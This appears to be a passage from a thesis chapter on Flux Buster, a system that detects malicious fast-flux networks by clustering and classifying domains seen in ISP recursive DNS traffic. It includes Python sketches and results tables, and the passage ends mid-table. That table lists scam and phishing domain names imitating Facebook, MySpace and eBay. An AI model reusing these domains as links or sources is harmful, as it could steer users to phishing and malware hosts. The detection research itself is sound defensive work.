In order to further narrow down the domain names to be processed by our domain clustering algorithms, we apply an additional filtering step F3. We keep only the domain names that respect any of the following filtering rules (see Section 3.2.2 for the notation), where the subscript $E$ indicates that the quantities are measured at the end of the epoch $E$ = 1 day:

F3-a) $T_E^{(d)} < 30$
F3-b) $|R_E^{(d)}| > 10$
F3-c) $|G_E^{(d)}| > 5$
F3-d) $|R_E^{(d)}| > 5$ AND $p_E > 0.8$
F3-e) $p_E > 0.5$ AND $T_E^{(d)} \leq 3600$ AND $|G_E^{(d)}| > 10$

3.2.4 Domain Clustering


At the end of each epoch E, we consider the list L of candidate flux domains, and we group them according to similarities in their resolved IP sets. This clustering step is motivated by the following reasons. Flux operators usually operate malicious flux services using an (often large) number of fast-flux domain names that all point to flux agents related to the same flux service. We speculate that one of the reasons for this behavior is to evade domain blacklists (DBLs). During our study, we came across a number of malicious flux services advertised through large sets of random-looking domain names. The flux operator seemed to be registering many new domain names every day to compensate for the older domain names that were identified as malicious by security researchers and added to DBLs.

Our clustering approach groups together domain names that, within an epoch E (equal to one day in our experiments), resolved to a common set of IP addresses. To perform domain clustering of flux domains that are related to each other, we use a single-linkage hierarchical clustering algorithm [Jain et al. (1988), Jain et al. (1999)], which adopts a friends-of-friends clustering strategy. In order to apply clustering on a set of domain names $D = \{d_1, d_2, .., d_n\}$, we first need to formally define a notion of similarity between them. We defined the following similarity metric between candidate flux domains. Given two domains $\alpha$ and $\beta$, and their cumulative sets of resolved IP addresses collected during an epoch E, respectively

Figure 3.5: Cluster Analysis, Sensor 1 (number of clusters vs. cut height h).

$R^{(\alpha)}$ and $R^{(\beta)}$, we compute their similarity score as

$$sim(\alpha, \beta) = \frac{|R^{(\alpha)} \cap R^{(\beta)}|}{|R^{(\alpha)} \cup R^{(\beta)}|} \cdot \frac{1}{1 + e^{\,\gamma - \min(|R^{(\alpha)}|, |R^{(\beta)}|)}} \in [0, 1] \qquad (3.1)$$

The first factor is the Jaccard index for the sets $R^{(\alpha)}$ and $R^{(\beta)}$, which intuitively measures the similarity between the two cumulative sets of resolved IPs. The second factor is a sigmoidal weight. In practice, the higher the minimum number of resolved IPs in $R^{(\alpha)}$ or $R^{(\beta)}$, the higher the sigmoidal weight. To better understand the choice of this weight factor, consider this example: if $|R^{(\alpha)} \cap R^{(\beta)}| = 1$ and $|R^{(\alpha)} \cup R^{(\beta)}| = 4$, or $|R^{(\alpha)} \cap R^{(\beta)}| = 10$ and $|R^{(\alpha)} \cup R^{(\beta)}| = 40$, the Jaccard index is 0.25 in both cases. However, in the second case we want the similarity to be higher, because there are 10 resolved IPs in common between the domains $\alpha$ and $\beta$, instead of just one. We can also think of the second factor as a sort of confidence on the first one. The parameter $\gamma$ is chosen a priori, and is only used to shift the sigmoid towards the right with respect to the x-axis. We set $\gamma = 3$ in our experiments, so that if $\min(|R^{(\alpha)}|, |R^{(\beta)}|) = 3$ the weight factor is equal to 0.5. As the minimum number of resolved IPs grows, the sigmoidal weight tends to its asymptotic value of 1 (e.g., when $\min(|R^{(\alpha)}|, |R^{(\beta)}|) = 10$, the weight factor is equal to 0.999).
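
A minimal Python sketch of Eq. (3.1), assuming the cumulative resolved-IP sets are available as Python sets; the function and variable names are our own.

    import math

    GAMMA = 3  # shifts the sigmoid so that min(|R|) = 3 gives weight 0.5

    def domain_similarity(r_alpha, r_beta, gamma=GAMMA):
        """Sketch of Eq. (3.1): Jaccard index of the two cumulative
        resolved-IP sets, damped by a sigmoidal confidence weight."""
        union = len(r_alpha | r_beta)
        if union == 0:
            return 0.0
        jaccard = len(r_alpha & r_beta) / union
        weight = 1.0 / (1.0 + math.exp(gamma - min(len(r_alpha), len(r_beta))))
        return jaccard * weight

    a = {"10.0.0.%d" % i for i in range(10)}
    b = {"10.0.0.%d" % i for i in range(5, 45)}  # 5 IPs in common, union of 45
    print(domain_similarity(a, b))  # Jaccard 5/45, sigmoidal weight ~0.999
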
A similarity (or proximity) matrix $P = \{s_{ij}\}_{i,j=1..n}$, consisting of the similarities $s_{ij} = sim(d_i, d_j)$ between each pair of domains $(d_i, d_j)$, can then be computed. The hierarchical clustering algorithm takes $P$ as input and produces as output a dendrogram (see example in Fig. 3.10), i.e., a tree-like data structure in which the leaves represent the original domains in $D$, and the length of the edges represents
Figure 3.6: Cluster Analysis, Sensor 2 (number of clusters vs. cut height h).

the distance between clusters [Jain et al. (1988)] (see the example in Figure 3.10). The single-linkage algorithm defines the similarity between two clusters $C_i = \{d_k^{(i)}\}_{k=1..c_i}$ and $C_j = \{d_h^{(j)}\}_{h=1..c_j}$ as $\sigma_{i,j} = \max_{l,m}\{sim(d_l^{(i)}, d_m^{(j)})\}$. The obtained dendrogram does not actually define a partitioning of the domains into clusters; rather, it defines relationships among domains. A partitioning of the set $D$ into clusters can then be obtained by cutting the dendrogram at a certain height $h$. The leaves that form a connected sub-graph after the cut are considered part of the same cluster [Jain et al. (1988)]. Of course, different values of the height of the cut $h$ may produce different clustering results. In order to choose the best dendrogram cut (i.e., the best clustering), we apply a clustering validation approach based on plateau regions [Dugad et al. (1998)]. In practice, we plot a graph that shows how the number of clusters varies for a varying height of the cut, and we look for plateau (i.e., flat) regions in the graph. For example, consider Figure 3.5 and Figure 3.6. The two graphs are related to clusters of candidate flux domain names extracted from two different RDNS sensors (see Section 3.3 for details). Both graphs are related to monitoring the DNS traffic from each sensor for one epoch E = 1 day. The long plateau region between 0.1 and 0.7 shows that varying the cut height h does not significantly change the number of obtained clusters. This stability in the number of clusters can be viewed as an indication of the fact that by cutting the dendrogram at a height h ∈ [0.1, 0.7] we would obtain a sort of natural grouping of the domain names. A manual validation of the clusters obtained using this analysis strategy confirmed that the obtained clusters were indeed correct. We will discuss the clustering results in more detail in Section 3.3.
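
The clustering step can be sketched as follows in Python, assuming the domain_similarity function from the previous sketch and SciPy's standard hierarchical-clustering routines. Converting similarities to distances as 1 − sim is our convention; whether the cut height in the figures is measured on the similarity or distance axis is not spelled out here, so the sketch simply treats h as a distance threshold.

    import numpy as np
    from scipy.cluster.hierarchy import linkage, fcluster
    from scipy.spatial.distance import squareform

    def cluster_domains(domains, resolved_sets, h=0.6):
        """Sketch of the clustering step: pairwise similarities via
        Eq. (3.1) are turned into distances 1 - sim, single-linkage is
        run, and the dendrogram is cut at height h."""
        n = len(domains)
        dist = np.zeros((n, n))
        for i in range(n):
            for j in range(i + 1, n):
                s = domain_similarity(resolved_sets[i], resolved_sets[j])
                dist[i, j] = dist[j, i] = 1.0 - s
        Z = linkage(squareform(dist), method="single")
        labels = fcluster(Z, t=h, criterion="distance")
        clusters = {}
        for name, lab in zip(domains, labels):
            clusters.setdefault(lab, []).append(name)
        return list(clusters.values())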

3.2.5 Service Classifier


Each cluster $C_i$ of candidate flux domains can be seen as a candidate flux service defined by the set of all the domain names in $C_i$, and the overall set of IP addresses these domains resolved to during an epoch E. Since filters F1 and F2 adopt a conservative approach and may not be able to filter out domains related to legitimate CDNs or other legitimate Internet services (e.g., pools of NTP servers) that have a behavior somewhat similar to flux services, after collecting and clustering the candidate flux domains we need to determine which clusters are actually related to malicious flux services and which ones are related to legitimate and non-flux networks. To this end, we apply a statistical supervised learning approach to build a network classifier which can automatically distinguish between malicious flux services and other networks, as shown in Figure 3.4.

We first describe and motivate the set of statistical features we use to distinguish between malicious flux services and legitimate/non-flux services. In [Passerini et al. (2008)], Passerini et al. proposed a thorough characterization of fast-flux domain names in terms of statistical features for supervised learning. They introduced a set of nine features based on the analysis of the set of IP addresses resolved by querying single domain names. In this work we adapt some of the features proposed in [Passerini et al. (2008)] to characterize clusters of domain names (as opposed to single domains) related to malicious flux services, and we introduce some additional new features. We divided our feature set into two groups, namely passive features and active features. We call passive those features that can be directly extracted from the information collected by passively monitoring the DNS queries at our RDNS sensors. On the other hand, active features need some additional external information to be computed (e.g., information extracted from whois queries, geolocation mapping of IP addresses, BGP announcement data, etc.). For each cluster of domains obtained as described in Section 3.2.4, and related to the epoch $E_m$, we compute the following statistical features:

Passive Features

φ1 Number of resolved IPs. This is the overall number of distinct resolved IP addresses ever observed during epoch $E_m$ for all the domains in a cluster. Malicious flux services typically use a large number of flux agents to provide load balancing and high availability of malicious content, and therefore feature φ1 will typically have a high value.

φ2 Number of domains. This is the total number of distinct domain names in a cluster. As mentioned above, some malicious flux services are advertised through large sets of fast-flux domains. This is often the case when the flux operator tries to avoid domain blacklisting by registering and advertising new random-looking domains every day.

φ3 Avg. TTL per domain. Average TTL of the domains in a cluster. Flux domains are configured with a low TTL to force RDNS servers to frequently flush their cache and query the authoritative DNS server for an updated list of resolved IPs. This way, the resolved IPs of flux domains are frequently changed to reflect changes in the set of active flux agents.

φ4 Network prefix diversity. This is the ratio between the number of distinct /16 network prefixes and the total number of IPs. This feature is used to estimate the degree of scattering of the IP addresses among different networks, and represents a reasonable approximation of the active features φ7 and φ8 (explained below).

φ5 Number of domains per network. Number of distinct domain names that resolved to at least one of the IP addresses in the considered cluster, during all the previous epochs $E_1, E_2, ...$ until the considered epoch $E_m$. In spite of the high variability of flux domain names, flux networks are rather stable and persistent [Konte et al. (2009)]. Thus, the same flux agents will be used by many distinct domain names over time. This feature measures how many domains can be associated to the IPs (i.e., the flux agents) in a cluster, throughout different epochs.

φ6 IP Growth Ratio. This represents the average number of new IP addresses discovered per DNS response related to any domain in a cluster, namely $\frac{1}{|C_i|} \sum_{d \in C_i} \frac{|R^{(d)}|}{Q^{(d)}}$. The higher this value, the higher the probability that the response to a new DNS query for a domain $d \in C_i$ will contain a set of new (never-seen-before) IPs, and therefore the higher the probability that $d$ is associated to a flux service.

Active Features

φ7 Autonomous System (AS) diversity, φ8 BGP prefix diversity, φ9 Organization diversity. We measure the ratio between the number of distinct ASs where the IPs of a cluster reside and the total number of resolved IPs. Also, we compute the ratio between the number of distinct organization names the IPs belong to (notice that an organization may announce multiple ASs) and the number of IPs in the cluster, and the ratio between the number of distinct BGP prefixes the IPs in the cluster belong to and the total number of IPs in the cluster.

φ10 Country Code diversity. We map each IP in a cluster to its geographical location and compute the ratio between the number of distinct countries across which the IPs are scattered and the total number of IPs. We expect high values of this feature for flux networks, since flux agents are typically located in many different countries.

φ11 Dynamic IP ratio. The bot-compromised machines that constitute malicious flux services are mostly home-user machines. In order to estimate whether an IP is related to a home-user machine, we perform a reverse (type PTR) DNS lookup for each IP, and we look for keywords such as dhcp, dsl, dial-up, etc., in the DNS response to identify machines that use a dynamic (as opposed to static) IP address. We then compute the ratio between the (estimated) number of dynamic IPs in the cluster and the total number of IPs. The intuition is that, contrary to malicious flux services, the vast majority of legitimate CDNs and other Internet services rely on professionally managed machines having static IP addresses. Therefore feature φ11 can help us distinguish between malicious flux services and other services.

φ12 Average Uptime Index. This feature is obtained by actively probing each IP in a cluster about six times a day for a predefined number of days (e.g. 5 days), attempting to establish TCP connections on ports 80/53/443, i.e., HTTP/DNS/HTTPS services (we use TCP instead of UDP for DNS probing, because most off-the-shelf DNS software is designed to listen on port 53 for both TCP and UDP communications). If the host accepts to establish the TCP connection, it is considered up, otherwise it is considered down. An estimate of the uptime of each IP is given by the ratio between the number of times the IP is found to be up and the total number of probes. Feature φ12 is computed as the average uptime for the IPs in a cluster.
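
To make the feature computation concrete, here is a sketch of how the passive features φ1, φ2, φ3, φ4 and φ6 might be computed for a single cluster; the input layout (a dict from domain name to a record holding its maximum TTL, cumulative resolved-IP set and query count) and all field names are assumptions of ours, and φ5 is omitted since it requires cross-epoch state.

    def passive_features(cluster):
        """Sketch: passive features phi1-phi4 and phi6 for one cluster.
        `cluster` maps each domain name to a record with its maximum TTL,
        cumulative resolved-IP set R(d) and query count Q(d); the field
        names are hypothetical. phi5 needs cross-epoch state (omitted)."""
        all_ips = set()
        for rec in cluster.values():
            all_ips |= rec["resolved_ips"]
        phi1 = len(all_ips)                 # number of resolved IPs
        phi2 = len(cluster)                 # number of domains
        phi3 = sum(r["ttl"] for r in cluster.values()) / phi2  # avg. TTL
        prefixes = {".".join(ip.split(".")[:2]) for ip in all_ips}
        phi4 = len(prefixes) / phi1         # /16 network prefix diversity
        # phi6: (1/|C|) * sum over domains of |R(d)| / Q(d)
        phi6 = sum(len(r["resolved_ips"]) / r["num_queries"]
                   for r in cluster.values()) / phi2
        return {"phi1": phi1, "phi2": phi2, "phi3": phi3,
                "phi4": phi4, "phi6": phi6}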

Features φ2, φ4, φ5, φ6, φ11 and φ12 constitute an original contribution of this work, compared to [Passerini et al. (2008)] and other previous work on detecting flux services, and allowed us to achieve a very high classification accuracy. In Section 3.3 we analyze in detail the effectiveness of the feature set described above for distinguishing between malicious flux services, legitimate CDNs, and other legitimate or non-flux services in general.
After measuring the features described above, we employ the popular C4.5 decision-tree classifier [Quinlan (1993)] to automatically classify a cluster $C_i$ as either a malicious flux service or a legitimate/non-flux service. The reasons for using a decision-tree classifier are as follows: a) decision trees are efficient and have been shown to be accurate in a variety of classification tasks; b) the decision tree built during training can be easily interpreted to determine what are the most discriminant features that allow us to distinguish between malicious flux services and legitimate/non-flux services; c) C4.5 is able to automatically prune the features that are not useful and would potentially create noise instead of increasing classification accuracy [Quinlan (1993)]. We first train the C4.5 classifier on a training dataset containing a number of labeled clusters related to malicious flux services and clusters related to legitimate/non-flux services. Afterwards, the classifier can be used online to classify the clusters obtained at the end of each epoch E from the data collected at each RDNS sensor, as shown in Figure 3.4. The details of how we obtained the labeled training dataset of malicious flux and legitimate clusters and estimated the accuracy of our network classifier are reported in Section 3.3.
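
As an illustration of the training and evaluation workflow (not of the exact C4.5 implementation used here), the following sketch uses scikit-learn's DecisionTreeClassifier, a CART-style tree, as a stand-in for C4.5, since C4.5 itself is not part of that library; the synthetic data is purely a placeholder for the labeled cluster feature vectors.

    import numpy as np
    from sklearn.model_selection import cross_val_score
    from sklearn.tree import DecisionTreeClassifier

    # Placeholder for the labeled dataset: one 12-dimensional feature
    # vector (phi1..phi12) per cluster; label 1 = malicious flux service,
    # 0 = legitimate/non-flux. The synthetic data below merely makes the
    # snippet runnable and pretends phi6 (index 5) is discriminant.
    rng = np.random.default_rng(0)
    X = rng.random((200, 12))
    y = (X[:, 5] > 0.5).astype(int)

    # CART as a stand-in for C4.5, which scikit-learn does not provide
    clf = DecisionTreeClassifier(max_depth=5, random_state=0)
    scores = cross_val_score(clf, X, y, cv=5, scoring="roc_auc")
    print("5-fold AUC: %.3f (+/- %.3f)" % (scores.mean(), scores.std()))

    clf.fit(X, y)
    print("feature index at the root split:", clf.tree_.feature[0])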

3.3 Experiments
In this Section we present the results obtained with our malicious flux network detection system. All the experiments related to the clustering of candidate flux domains and the classification of flux service networks were conducted on a 4-core 3GHz Intel Xeon machine with 16GB of memory. However, because the machine was shared with other research applications, we constrained ourselves to using a maximum of 5GB for our experiments.

3.3.1 Collecting Recursive DNS Traffic


Using the data collection architecture shown in Figure 3.3, we placed two traffic sensors in front of two different RDNS servers of a large North American Internet Service Provider (ISP). These two sensors monitored the RDNS traffic coming from users located in the north-eastern and north-central United States, respectively. Overall, the sensors monitored the live RDNS traffic generated by more than 4 million users for a period of 45 days, between March 1 and April 14, 2009. During this period, we observed an average of about 1.3 billion DNS queries of type A and CNAME per sensor, as shown in Figure 3.7(a). Overall we monitored over 2.5 billion DNS queries per day, related to hundreds of millions of distinct domain names.
The traffic collected at each sensor is reduced using filters F1 and F2, as shown in Figure 3.4 and described in Section 3.2. We set the epoch E to be one day. Figure 3.7 shows the number of candidate flux domains obtained at the end of each epoch. It is easy to see that the overwhelming traffic volume monitored by the RDNS sensors is effectively reduced from more than $10^9$ DNS queries for tens of millions of distinct domain names, to an average of $4 \cdot 10^4$ to $6 \cdot 10^4$ candidate flux domain names per day (depending on the sensor we consider).

3.3.2 Clustering Candidate Flux Domains


At the end of each epoch, the candidate flux domains extracted by the RDNS sensors are transferred to our Detector machine (see Figure 3.3), where they undergo a clustering process.

Once filtering is completed, we apply a single-linkage hierarchical clustering algorithm [Jain et al. (1988), Jain et al. (1999)] to group together domains that belong to the same network, as described in Section 3.2.4. After transferring the data collected from the RDNS sensors to our detection system, the time needed for the clustering process was around 30 to 40 minutes per day and per sensor. The height of the dendrogram cut was chosen to be h = 0.6. This choice is motivated by the fact that we want to cut the dendrogram at a height within the largest plateau region (see Section 3.2.4). In particular, by plotting the cluster analysis graphs reported in Figure 3.5 and Figure 3.6 for different days, we noticed that the value h = 0.6 (on the x-axis) was always located around the end of the largest plateau region and provided high quality clusters. Using h = 0.6 we obtained an average of about 4,000 domain clusters per day.

Clustering is a completely unsupervised process [Jain et al. (1988), Jain et al. (1999)], and automatically verifying the results is usually very hard, if at all possible. Therefore, with the help of a graphical interface we developed, we manually verified the quality of the results for a subset of the clusters obtained every day. In particular, in order to assess the quality of the domain clusters, we manually verified that the domain names in a cluster were actually related to the same service (e.g., the same CDN, the same malicious flux network, the same NTP pool, etc.). In many cases this manual evaluation was straightforward. For example, our clustering algorithm was able to correctly identify clusters of domain names belonging to a malicious flux service that was being used for phishing facebook login credentials. In this case the flux domain names all shared very strong structural similarities, because they all started with login.facebook, contained a string of the form personalid-RAND, where RAND is a pseudo-random string, and ended with .com. Also, our IP-based clustering process (see Section 3.2.4) was able to correctly group together domain names related to the NTP server pool in Europe and separate them from the group of domains related to the NTP pool in North America, the pool of domains related to Oceania, etc. The domain names related to the NTP pools in different regions of the world can visually be distinguished from each other. Therefore, it was easy to verify that domains such as 0.europe.pool.ntp.org, uk.pool.ntp.org,
fr.pool.ntp.org were all correctly grouped together, and separated from the cluster containing au.pool.ntp.org and oceania.pool.ntp.org, for example. In other cases we had to confirm the correctness of our clusters by manually probing the clustered domain names and finding relations between the obtained resolved IPs and the services (e.g., web pages) provided through them. Figures 3.8 and 3.9 show snapshots of our graphical interface, showing a malicious flux network and a legitimate NTP pool, respectively.

3.3.3 Evaluation of the Service Classifier


In this section we explain the results related to the classification of clusters of domains into either malicious flux services or legitimate/non-flux services. As described in Section 3.2.5, we use a statistical supervised learning approach to build a service classifier. In order to use a supervised learning approach, we first need to generate a dataset of labeled clusters (the ground truth) which can be used to train our statistical classifier and evaluate its classification accuracy. We first describe how this labeled dataset was generated, and then motivate why the different statistical features used by the classifier, described in detail in Section 3.2.5, allow us to accurately detect malicious flux service networks.

In order to construct the labeled dataset for our experiments, we manually inspected and labeled a fairly large number of clusters of domains generated by the clustering process described in Section 3.2.4. To make the labeling process less time consuming, we developed a graphical interface that allows us to rank clusters of domains according to different features. For example, our interface allows us to rank all the clusters according to their network prefix diversity (feature φ4), the cumulative number of distinct resolved IPs (feature φ1), the IP growth ratio (feature φ6), etc. In addition, our graphical interface allows us to inspect several other properties of the clusters, such as CNAME entries collected from DNS responses, the content of Web pages obtained by contacting a sample of resolved IPs from a cluster, information gathered from queries to whois and search engines, etc. Also, for each cluster we compute a cluster nickname by selecting a domain name among those whose second level domain (2LD) is the most frequent in the cluster (the 2LD of a domain name d is defined as the last two substrings separated by a dot; for example, the 2LD of www.example.com is example.com).

Table 3.1 shows an example of 4 clusters related to legitimate services and 3 clusters related to malicious flux service networks, and reports for each cluster the values of the passive and active statistical features described in Section 3.2.5. All clusters are related to domains passively collected from DNS traces using our two RDNS sensors. Clusters l1 and l2 represent typical legitimate CDNs, l3 is related to the European pool of NTP servers [NTPpool], whereas l4 is related to the OASIS infrastructure [OASIS]. On the other hand, clusters m1, m2, and m3 represent 3 different examples of malicious flux networks. In particular, m1 consists of 466 different domain names that serve the very same adult content, m2 consists of 3 domains that serve PayPal phishing webpages, and m3 consists of 269 domains that run the same

Cluster ID   Cluster Nickname                        Use                     Label
l1           cdne.gearsofwar.xbox.com                CDN                     Legitimate
l2           fotf.cdnetworks.net                     CDN                     Legitimate
l3           3.europe.ntp.org                        NTP pool                Legitimate
l4           opendht.nyuld.net                       OASIS                   Legitimate
m1           50b0f40526956b85.saidthesestory.com     Adult Content/Malware   Malicious Flux
m2           paypal.database-confirmation.com        Phishing                Malicious Flux
m3           hqdvrp.flagacai.com                     Pharmacy Scam           Malicious Flux

Passive features                       l1     l2     l3     l4     m1     m2     m3
Number of resolved IPs (φ1)            25     22     1069   346    765    137    1011
Number of domains (φ2)                 12     24     15     13     466    3      269
Avg. TTL per domain (φ3)               22     20     1402   7421   300    180    180
Network prefix diversity (φ4)          0.12   0.5    0.53   0.483  0.81   0.84   0.445
Number of domains per network (φ5)     488    165    57     54     42000  228    1632
IP Growth Ratio (φ6)                   0.028  0.016  0.039  0.021  0.932  0.374  0.56

Active features                        l1     l2     l3     l4     m1     m2     m3
AS diversity (φ7)                      0.04   0.364  0.383  0.396  0.25   0.5    0.193
BGP prefix diversity (φ8)              0.12   0.68   0.562  0.485  0.77   0.8    0.43
Organization diversity (φ9)            0.04   0.364  0.382  0.393  0.23   0.47   0.186
Country Code diversity (φ10)           0.04   0.136  0.033  0.078  0.054  0.212  0.05
Dynamic IP ratio (φ11)                 0      0      0.015  0      0.132  0.32   0.385
Average Uptime Index (φ12)             0.993  0.925  0.778  0.95   0.148  0.063  0.088

Table 3.1: Examples of legitimate and malicious flux networks and their passive and active feature values.

online pharmacy scam scheme. As we discussed in Section 3.2.5, we use the C4.5 decision tree classifier to automatically distinguish between clusters of domains related to malicious flux networks and clusters related to legitimate or non-flux networks. We discuss the details of how we trained and tested our classifier later in this section. Here it is important to notice that one of the reasons we chose the C4.5 classifier is that the decision tree obtained after the training period is relatively easy to interpret [Quinlan (1993)]. In particular, we noticed that when using the passive features described in Section 3.2.5 for training, the classifier indicated that the IP Growth Ratio (feature φ6) is the most discriminant feature (i.e., the root of the decision tree). It is easy to see that this is actually the case for the examples reported in Table 3.1, where the malicious flux networks have a value of φ6 that is always higher than the one computed for the legitimate networks. This confirms the fact that the rapid change of the resolved IPs of flux domains is a distinctive characteristic of malicious flux service networks.

Since we focus on classifying malicious flux services, and considering that the number of flux agents for each flux service network is usually very high, we only consider clusters of domains for which overall we observed at least φ1 > 10 resolved IPs. With the help of our graphical interface, during the entire month of March 2009 we were able to label 670 clusters as being related to malicious flux networks of various

                     AUC            DR            FP
All Features         0.992 (0.003)  99.7% (0.36)  0.3% (0.36)
Passive Features     0.993 (0.005)  99.4% (0.53)  0.6% (0.53)
φ6, φ3, φ5           0.989 (0.006)  99.3% (0.49)  0.7% (0.49)

Table 3.2: Classification performance computed using 5-fold cross-validation. AUC = Area Under the ROC Curve; DR = Detection Rate; FP = False Positive Rate. The numbers between parentheses represent the standard deviation of each measure.

kinds (e.g., flux networks serving malware, adult content, phishing websites, etc.), and 8541 clusters related to non-flux/legitimate services, including clusters related to different CDNs, NTP pools, IRC pools, and other legitimate services. Using this labeled dataset and a 5-fold cross-validation approach, we evaluated the accuracy of our classifier. The obtained results are reported in Table 3.2. It is easy to see that our network classifier is able to reach a very high Area Under the ROC Curve [Bradley (1997)], and a high detection rate and low false positive rate at the same time. We performed experiments using three different sets of features. First, we used all the passive and active features described in Section 3.2.5 to characterize clusters of domains. Afterwards, we repeated the same experiments using only the passive features (second row in Table 3.2). From this last experiment, the C4.5 learning algorithm generated a decision tree whose root was feature φ6, with features φ3 and φ5 as children nodes at the top of the tree. This indicates that these three features tend to be the most useful ones for distinguishing between malicious flux networks and legitimate networks. For the sake of comparison, we evaluated the classification performance of our classifier using only these three features. As we can see from the third row in Table 3.2, only three features are sufficient to obtain very good classification results, although using all the available features produces slightly better results. Furthermore, we evaluated our classifier in an operational setting. Namely, we used the entire labeled dataset described above to train our network classifier, and then we used the obtained classifier to classify new (i.e., not seen during training) clusters of domains obtained in the first 14 days of April. During this period we obtained an average of 448 clusters per day (again, considering only clusters for which φ1 > 10), 26 of which were classified as being related to flux service networks. We manually verified that the classifier correctly labeled clusters related to malicious flux networks with very few false positives, thus confirming the results reported in Table 3.2. Overall, during the entire 45-day period of evaluation, between March 1 and April 14, 2009, we detected an average of 23 malicious flux service networks per day, with a total of 61,710 flux domain names and 17,332 distinct IP addresses related to flux agents.

3.4 Applications
From March 2009 up to now (February 2010), Flux Buster has been continuously detecting (new) malicious fast flux networks. Furthermore, since July 2009, RDNS traffic has also been collected from two additional sensors, located in Italy and in the USA, respectively. Overall, from March 2009 up to February 2010, we detected about 180,000 unique IP addresses associated to flux agents. This value clearly shows the relevance of the threat posed by fast flux networks. Figure 3.11 shows the distribution of these flux agents among different countries (the country of each agent has been obtained by means of the whois service of the Cymru team). It is easy to see that a substantial fraction of flux agents are from the USA, and this is in agreement with results from other fast flux detectors (e.g. [Atlas, DNSBL]). Almost all flux networks are employed to support web-based scams, from illegal adult websites to phishing scams involving high-profile companies. Table 3.3 shows some examples of malicious fast flux networks. From these examples, it is clear that these networks are employed for a wide range of scams against web users. However, depending on the scam type, fast flux domains may have different characteristics. In particular, we found that phishing websites have a short lifetime (e.g. a few days), whereas adult websites may be active for months. We speculate that this may be due to a relatively higher effort of organizations (e.g. banks, governments) against phishing websites.

In any case, no legitimate websites are hosted by fast flux networks. If a website is hosted by a flux network, it is very likely that it is malicious and should be blocked. Since this task is inherently difficult, in this Section we propose two client-side security applications, supported by the output of Flux Buster. Our goal is to prevent users from retrieving malicious content hosted through malicious fast flux networks.

3.4.1 Safe browsing


The Google safebrowsing API is employed by most popular web browsers to check websites against a blacklist of known malicious sites. In order to understand the possible contribution of Flux Buster to the state-of-the-art protection of web users, we verified which malicious flux domain names (detected by Flux Buster) are actually noticed by the Google safebrowsing service. To this end, we employed Google's safebrowsing diagnostic tool, http://www.google.com/safebrowsing/diagnostic?site=google.com. Such a web interface allows a user to check a URL (or a domain name) against a list of known-as-malicious websites. According to Google, this diagnostic service maintains records of malicious websites for a maximum of 90 days.

Thus, on February 2, 2010, we experimented with flux domain names detected in the time interval November 3, 2009 - February 2, 2010. In such a period of time, we identified 21,108 IP addresses of flux agents, and a total of 16,375 unique malicious (flux) domain names. With the help of our validation interface we manually verified that all these domains were actually associated to fast flux networks.
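
A sketch of how such a batch check could be automated against the diagnostic endpoint mentioned above; since the format of the returned page is not documented here, the snippet only fetches the raw HTML for manual inspection, and the example domain is taken from the earlier phishing scenario.

    import time
    import urllib.request

    DIAG = "http://www.google.com/safebrowsing/diagnostic?site={}"

    def fetch_diagnostic(domain):
        """Fetch the raw diagnostic page for a domain; interpreting the
        (undocumented) HTML is left to manual inspection."""
        with urllib.request.urlopen(DIAG.format(domain), timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")

    for d in ["login.facebook.sessionnew83.com"]:  # flux domains from Flux Buster
        html = fetch_diagnostic(d)
        print(d, "->", len(html), "bytes of diagnostic HTML")
        time.sleep(1)  # rate-limit queries out of politeness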

Figure 3.12 shows the number of websites which have been visited (in yellow) by the Google safebrowsing engine. It is worth noting that out of 16,375 flux domain

SCAM TYPE FAST FLUX DOMAIN NAMES


Adult Content 0711afafa7803d51.nugentcelticdonnell.com, 088683b12777d475.ghostsbarredrental.com,
08f15257a0ea7ee5.spreadnettingcleanly.com, 09ad518ad726e193.squadsvariousembryos.com,
09ae7f81efa7faa2.fraserlibraryshabby.com, 0a1a7c2792c461ed.nugentcelticdonnell.com,
0b53caa4e8a9edb5.fraserlibraryshabby.com, 0bc0dd7f7773c50c.nugentcelticdonnell.com,
0bfd3365dca2c45b.nugentcelticdonnell.com, 0c9328f675b1b931.ghostsbarredrental.com,
0d565d437fb5869d.ghostsbarredrental.com, 0d9d81f5e70761d2.squadsvariousembryos.com,
0dfde08e68ca8358.ghostsbarredrental.com, 0e294041c5d3d17c.developleftcity.com,
0e3fe6f42143105b.squadsvariousembryos.com, 0f255699977f3a81.ghostsbarredrental.com,
0fde9565dad27a33.nugentcelticdonnell.com, 100d83dcb74219a6.fraserlibraryshabby.com,
14cc04d937dd090f.fraserlibraryshabby.com, 163f3db2671f9703.fraserlibraryshabby.com,
189dda5b6c51569e.squadsvariousembryos.com, 18ad145ae37d4318.ghostsbarredrental.com,
191ab3abf627f482.nugentcelticdonnell.com, 1a3a25badc9819c5.nugentcelticdonnell.com [· · · many
more]
Facebook phishing facebook.shared.accessservlet.personalid-fbhmod8j9.processlogon.344session.com,
facebook.shared.accessservlet.personalid-kd0vb3bjj.ceptservlet.8345server.com,
facebook.shared.accessservlet.personalid-mct6meeyi.alternative.8345server.com,
facebook.shared.accessservlet.personalid-xm4f9y8xa.emberuiweb.344session.com,
facebook.shared.accountholder.personalid-0ip00okut.mixed.5435core.com,
facebook.shared.accountholder.personalid-3vj54osat.accountholder.344session.com,
facebook.shared.accountverify.personalid-4z37tsrz9.usermanage.344session.com,
facebook.shared.accountverify.personalid-sa3vts29i.serveronline.8345server.com [· · · many more]
Myspace phishing accounts.myspace.com.tteszk.org.uk, accounts.myspace.com.tteszk.me.uk,
accounts.myspace.com.tteszk.co.uk, accounts.myspace.com.tteszg.org.uk,
accounts.myspace.com.tteszg.me.uk, accounts.myspace.com.tteszg.co.uk, accounts.myspace.com.tteszf.co.uk,
accounts.myspace.com.ttesza.org.uk, accounts.myspace.com.ttesza.me.uk,
accounts.myspace.com.ttesza.co.uk, accounts.myspace.com.terhhoq.org.uk,
accounts.myspace.com.terhhoq.me.uk, accounts.myspace.com.terhhoq.co.uk,
accounts.myspace.com.terhhol.org.uk, accounts.myspace.com.terhhol.me.uk,
accounts.myspace.com.terhhol.eu, accounts.myspace.com.terhhol.co.uk, accounts.myspace.com.terhhok.org.uk,
accounts.myspace.com.terhhok.me.uk, accounts.myspace.com.terhhok.eu, accounts.myspace.com.iuuuujer.me.uk,
accounts.myspace.com.iuuuujer.eu, accounts.myspace.com.iuuuujer.co.uk,
accounts.myspace.com.iuuuujek.org.uk, accounts.myspace.com.iuuuujek.me.uk [· · · many more]
Ebay phishing cgi.ebay.com.fvdssrt.com, cgi.ebay.com.idservertff.net, cgi.ebay.com.idsrvtttr.com,
